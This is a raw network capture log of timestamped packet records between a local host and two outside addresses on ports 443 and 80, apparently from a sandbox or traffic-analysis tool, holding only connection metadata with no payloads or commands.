                                                                                                            Nov 20, 2024 16:58:11.338491917 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.338505983 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.338608027 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.338625908 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.348397017 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.348407030 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.348488092 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.348516941 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.359240055 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.359247923 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.359308958 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.359325886 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.372750044 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.372759104 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.372828007 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.372837067 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.380501032 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.380510092 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.380534887 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.380573034 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.380582094 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.380624056 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.387772083 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.387779951 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.387837887 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.387842894 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.393565893 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.393577099 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.393631935 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.393637896 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.401359081 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.401371002 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.401420116 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.401427984 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.407885075 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.407893896 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.407968998 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.407977104 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.414858103 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.414868116 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.414931059 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.414938927 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.420599937 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.420610905 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.420664072 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.420670986 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.426616907 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.426625967 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.426681995 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.426693916 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.533310890 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.533348083 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.533417940 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.533432961 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.533444881 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.538857937 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.538868904 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.538897038 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.538952112 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.538959980 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.539004087 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.545347929 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.545357943 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.545380116 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.545430899 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.545448065 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.551269054 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.551279068 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.551296949 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.551342010 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.551363945 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.555126905 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.555140018 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.555217981 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.555224895 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.559413910 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.560264111 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.560280085 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.560333014 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.560339928 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.567951918 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.567991018 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.568026066 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.568037033 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.568105936 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.573340893 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.573362112 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.573429108 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.573482990 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.577867031 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.577938080 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.577949047 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.581729889 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.581794977 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.581804991 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.585278988 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.585346937 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.585355997 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.589613914 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.589682102 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.589694023 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.592869997 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.592942953 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.592950106 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.596324921 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.596393108 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.596400976 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.600291014 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.600359917 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.600368023 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.732054949 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.732136011 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.732168913 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.735476971 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.735491037 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.735518932 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.735539913 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.735548019 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.735583067 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.738537073 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.738548040 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.738581896 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.738616943 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.738637924 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.741837025 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.741847992 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.741873980 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.741894960 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.741914988 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.745242119 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.745255947 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.745271921 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.745306969 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.745332003 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.748866081 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.748879910 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.748939991 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.748963118 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.751862049 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.751902103 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.751939058 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.751955032 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.752007008 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.754909039 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.754920006 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.754977942 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.754990101 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.758835077 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.758919001 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.758939028 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.761873960 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.761945963 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.761954069 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.765496016 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.765583992 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.765594006 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.768517971 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.768593073 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.768603086 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.772392035 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.772454023 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.772464037 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.775429964 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.775497913 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.775506020 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.779278994 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.779366016 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.779385090 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.782387972 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.782473087 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.782489061 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.865583897 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.865606070 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.865621090 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.865686893 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:11.865690947 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.865704060 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.865719080 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.865735054 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:11.865757942 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:11.865830898 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.865847111 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.865852118 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.865864992 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.865900040 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:11.934158087 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.934267044 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.934298992 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.937359095 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.937372923 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.937391996 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.937422991 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.937443018 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.937491894 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.941113949 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.941126108 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.941153049 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.941176891 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.941191912 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.944261074 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.944272995 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.944293976 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.944325924 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.944340944 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.948030949 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.948044062 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.948065042 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.948100090 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.948128939 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.951036930 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.951047897 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.951105118 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.951122046 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.954338074 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.954353094 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.954411030 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.954426050 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.958066940 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.958080053 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.958146095 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.958159924 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.961077929 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.961122990 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.961158991 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.961173058 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.961224079 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.964894056 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.964920044 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.964979887 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.964992046 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.968044043 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.968107939 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.968120098 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.971590996 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.971648932 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.971662045 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.974602938 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.974670887 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.974683046 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.977819920 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.977878094 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.977890968 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.981623888 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.981683016 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.981694937 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.984805107 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.984880924 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.984893084 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.985171080 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.985193968 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.985224962 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:11.989571095 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.989656925 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.055335999 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.055464029 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.055603027 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.059382915 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.059515953 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.059585094 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.066176891 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.066359043 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.066489935 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.074723005 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.075460911 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.075527906 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.082609892 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.083009958 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.083079100 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.091088057 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.091232061 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.091305971 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.099562883 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.099968910 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.100039005 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.107777119 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.107896090 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.107964993 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.116450071 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.116837978 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.116929054 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.124500036 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.124907017 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.124984980 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.135396957 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.135433912 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.135503054 CET4917580192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:12.138585091 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.138694048 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:12.138725996 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.142529964 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.142563105 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.142585993 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.142606020 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:12.142627001 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:12.142635107 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.143546104 CET8049175192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.145368099 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.145389080 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.145406961 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.145443916 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:12.145464897 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.145477057 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:12.148519039 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.148539066 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.148556948 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.148586988 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:12.148602962 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.148641109 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:12.152312994 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.152326107 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.152349949 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.152384996 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:12.152401924 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:12.155443907 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.155452013 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.155509949 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:12.155522108 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.158377886 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:12.158385038 CET44349174142.215.209.78192.168.2.22
